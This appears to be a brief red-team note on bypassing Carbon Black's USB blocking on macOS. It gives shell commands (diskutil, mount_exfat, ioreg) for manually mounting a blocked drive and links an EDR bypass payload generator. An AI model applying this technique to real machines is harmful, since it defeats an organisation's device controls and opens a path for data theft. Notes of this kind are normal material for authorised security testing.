Carbon Black USB Blocking Bypass
- Mount via Virtual Machine Kext
- Mount via Volume Bypass ``` Insert SSD Drive should appear in Disk Utility.app but not mounted diskutil list # determine the format that is required sudo mkdir /Volumes/Bypass sudo /sbin/mount_exfat /dev/disk3s1 /Volumes/Bypass
ioreg -rd1 -c IOUSBHostDevice # determine if a USB exists ```
- Credits: Rezkon =).
Resources
- EDR Bypass Payload Generator: https://github.com/optiv/Freeze
- https://www.optiv.com/insights/source-zero/blog/sacrificing-suspended-processes